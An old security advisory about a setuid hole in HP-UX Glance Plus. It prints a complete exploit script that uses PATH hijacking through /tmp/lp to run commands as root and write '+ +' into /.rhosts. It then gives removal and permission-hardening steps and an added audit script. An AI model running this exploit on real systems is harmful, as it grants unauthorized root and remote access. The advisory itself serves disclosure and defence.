COMMAND

    /usr/perf/bin/glance

SYSTEMS AFFECTED

    HP 9000/700

PROBLEM

        #!/bin/ksh
        # the other .traz

        GLANCE=/usr/perf/bin/glance

        # Put any commands you want into /tmp/lp, and they'll be run as root, basically
        cat > /tmp/lp << EOF
        #!/bin/ksh
        echo '+ +' >> /.rhosts
        chmod 666 /.rhosts
        EOF

        echo "Please wait about 10 or 15 seconds for your commands to run"
        chmod 777 /tmp/lp
        PATH=/tmp:$PATH
        export PATH
        ${GLANCE} -j 1 -p bob -iterations 1 -maxpages 1 > /dev/null 2>&1
        rm /tmp/lp

SOLUTION

    Glance Plus is a performance monitor that is included in most
    HP-UX system installations as a demo package, or can be purchased
    separately. If you do not need to do system performance
    monitoring, you should remove this whole package, which includes
    all the files in /usr/perf. An earlier problem with Glance was
    covered in HP Security Advisory 9405-011, which describes a
    patch that updates Glance to version B.09.01 (700-800) or A.09.07
    (300, 400). The current vulnerability is not fixed by these
    updates. If you need to keep this package, you should change the
    permissions of all the files in /usr/perf to owner-only access
    and clear the suid bit. Check that the files are owned by root.
    Normal users will no longer be able to use this program, but the
    system manager will be able to do so when logged in as root.
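
    The lock-down steps above as a script. This is an added example,
    not part of the original advisory; audit_tree and harden_tree are
    hypothetical helper names, and the setgid check and the skipping
    of symlinks go beyond what the advisory lists.

```shell
#!/bin/sh
# Added example: audit and lock down a directory tree (e.g. /usr/perf).
# audit_tree / harden_tree are hypothetical helpers, not HP tooling.

# Print one finding per line as "<REASON> <path>":
#   SETID  - setuid or setgid bit is set (setgid is an extra check)
#   ACCESS - any group/other permission bit is set (not owner-only)
#   OWNER  - not owned by the expected owner (default: root)
audit_tree() {
    dir=$1
    owner=${2:-root}
    # Symlinks are skipped: a link's own mode bits carry no meaning.
    find "$dir" ! -type l \( -perm -4000 -o -perm -2000 \) -print |
        sed 's/^/SETID /'
    find "$dir" ! -type l \( -perm -040 -o -perm -020 -o -perm -010 \
        -o -perm -004 -o -perm -002 -o -perm -001 \) -print |
        sed 's/^/ACCESS /'
    find "$dir" ! -user "$owner" -print | sed 's/^/OWNER /'
}

# Clear setuid/setgid and remove all group/other access.
harden_tree() {
    dir=$1
    # "! -type l" stops chmod from following a symlink to a file
    # that lives outside the tree being hardened.
    find "$dir" ! -type l -exec chmod u-s,g-s,go-rwx {} +
}

# Stand-alone use: sh thisfile /usr/perf   (audit only, changes nothing)
if [ "$#" -ge 1 ]; then
    audit_tree "$@"
fi
```

    Run the audit first and review its output; harden_tree does not
    change ownership, so OWNER findings still need a chown by root.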